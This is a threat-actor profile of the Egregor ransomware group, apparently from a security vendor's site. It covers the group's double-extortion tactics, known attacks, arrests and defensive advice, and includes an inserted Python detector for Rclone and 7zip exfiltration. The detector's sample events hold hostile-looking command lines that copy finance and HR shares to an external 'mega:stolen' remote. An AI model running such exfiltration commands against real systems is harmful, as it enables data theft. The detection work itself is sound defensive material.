Threat Actor Profile
Egregor
Egregor is a sophisticated ransomware-as-a-service (RaaS) operation that burst onto the scene in September 2020, quickly gaining notoriety as the heir apparent to the infamous Maze ransomware group. Known for its double-extortion tactics, Egregor not only encrypts victim data but also exfiltrates it, threatening public release to pressure companies into paying up.
Country of Origin
The exact country of origin for Egregor's operators is unknown. However, some members of an affiliated group were arrested in Ukraine, suggesting a connection to Eastern Europe.
Members
As a RaaS operation, Egregor's "members" are a distributed network of affiliates who carry out the attacks. In early 2021, Ukrainian and French authorities arrested several individuals believed to be affiliates who provided logistical and financial support to the group.
Leadership
The leadership structure and specific aliases of Egregor's core team remain unknown.
Egregor TTPs
Tactics
Egregor's primary goal is financial extortion. Their tactics are centered around maximizing pressure on victims to force a ransom payment. This is achieved through a double-extortion model where they first steal sensitive corporate data and then encrypt the network. If the victim hesitates to pay, the group publishes the stolen data on a public leak site, adding a layer of public humiliation and regulatory risk to the incident.
Techniques
These actors are jacks-of-all-trades when it comes to getting inside a network. They often gain initial access through compromised credentials for Remote Desktop Protocol (RDP) or VPNs. Phishing emails with malicious attachments are another common entry point. Once inside, they use popular penetration testing tools like Cobalt Strike and network scanners to map the environment, escalate privileges, and move laterally to compromise as much of the network as possible.
Procedures
Egregor's procedures show a clear, methodical approach. After initial access, they deploy malware like QakBot or IcedID to establish a foothold. They then use tools like Rclone (often disguised as svchost) and 7zip to exfiltrate large volumes of data. Once the data is secured, they execute the ransomware payload, which encrypts files and even uses the victim's own printers to print out copies of the ransom note, titled "RECOVER-FILES.txt," ensuring the message is received loud and clear.
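Detection logic for the Rclone-disguised-as-svchost, 7zip staging and RECOVER-FILES.txt indicators described above, as an added Python example (not code from the original profile or from Huntress). It assumes Sysmon-style process-creation fields (Image, OriginalFileName, CommandLine); the sample events, the regexes and the `mega:` remote name are constructed for illustration.

```python
"""Flag the Egregor exfiltration and ransom-note tradecraft described above.
Field names mirror Sysmon process-creation and file-creation events;
every sample event below is constructed, not taken from a real incident."""
import ntpath
import re
from dataclasses import dataclass

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# rclone <verb> <src> <remote>:<path>; remote names are 2+ characters, so a
# bare drive letter such as C: does not match (local-to-remote copies only)
RCLONE_CMD = re.compile(r"\b(?:copy|sync|move)\s+\S+\s+[A-Za-z0-9_-]{2,}:", re.I)
# 7z.exe / 7za.exe invoked with the "a" (add to archive) command
SEVENZIP_ADD = re.compile(r"\b7za?(?:\.exe)?\s+a\b", re.I)
RANSOM_NOTE = "recover-files.txt"

@dataclass
class ProcEvent:
    image: str          # full path of the started executable
    original_name: str  # OriginalFileName from the PE version resource
    cmdline: str

def classify_process(ev: ProcEvent) -> list[str]:
    """Return the Egregor-style behaviours a process-creation event matches."""
    findings = []
    name = ntpath.basename(ev.image).lower()
    folder = ntpath.dirname(ev.image).lower()
    orig = ev.original_name.lower()
    # svchost.exe outside System32/SysWOW64, or whose PE metadata names another
    # binary, is the "Rclone disguised as svchost" pattern
    if name == "svchost.exe" and (folder not in SYSTEM_DIRS or orig != "svchost.exe"):
        findings.append("svchost masquerade")
    if orig == "rclone.exe" or RCLONE_CMD.search(ev.cmdline):
        findings.append("rclone exfiltration")
    if SEVENZIP_ADD.search(ev.cmdline):
        findings.append("7zip archive staging")
    return findings

def is_ransom_note(path: str) -> bool:
    """File-creation event check for the Egregor ransom note name."""
    return ntpath.basename(path).lower() == RANSOM_NOTE

SAMPLE_EVENTS = [  # constructed: one benign svchost, one renamed rclone, one 7z run
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(r"C:\ProgramData\svchost.exe", "rclone.exe",
              r"svchost.exe copy C:\Shares\Finance mega:stolen --transfers 32"),
    ProcEvent(r"C:\Users\Public\7z.exe", "7z.exe",
              r"7z.exe a -pSecret C:\Users\Public\hr.7z C:\Shares\HR"),
]
```

Feed real process and file events into `classify_process` and `is_ransom_note`; the benign System32 svchost returns no findings, the renamed Rclone triggers both the masquerade and exfiltration checks.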
Notable Cyberattacks
Egregor made headlines throughout late 2020 with a string of aggressive, high-profile attacks. In October 2020, they hit both video game company Ubisoft and book retailer Barnes & Noble, leaking data from both to their public shame site. In December 2020, they targeted Randstad, a global HR and recruitment firm, claiming to have stolen a significant amount of data. These attacks demonstrated the group's ability to successfully infiltrate large, multinational corporations and follow through on their threats of public data leaks.
Law Enforcement & Arrests
In February 2021, a joint operation by French and Ukrainian authorities resulted in the arrest of several individuals in Ukraine linked to the Egregor operation. The suspects were described as affiliates who provided hacking and logistical support, rather than the core developers. This law enforcement action significantly disrupted the group's activities, and Egregor's public leak site went offline shortly after. While some key members likely remain at large, the arrests marked a major blow to the RaaS network.
How to Defend Against Egregor
Secure Remote Access: Lock down RDP and VPNs. Use multi-factor authentication (MFA) everywhere you can, restrict access to only those who need it, and use strong, unique passwords.
Patch, Patch, Patch: Keep your systems and software updated. Egregor and its affiliates are always looking for unpatched vulnerabilities to exploit.
Train Your Team: Since phishing is a common entry vector, educate your employees to spot and report suspicious emails. A well-trained team is your first line of defense.
Back It Up: Maintain offline, isolated backups of your critical data. If the worst happens, you can restore your systems without paying a dime.
The Huntress Managed Security Platform is built to stop attackers in their tracks. Our 24/7 ThreatOps team actively hunts for the very TTPs used by groups like Egregor—from malicious scripts and suspicious processes to lateral movement with tools like Cobalt Strike. We don't just send alerts; we provide actionable remediation guidance to kick hackers out and keep them out.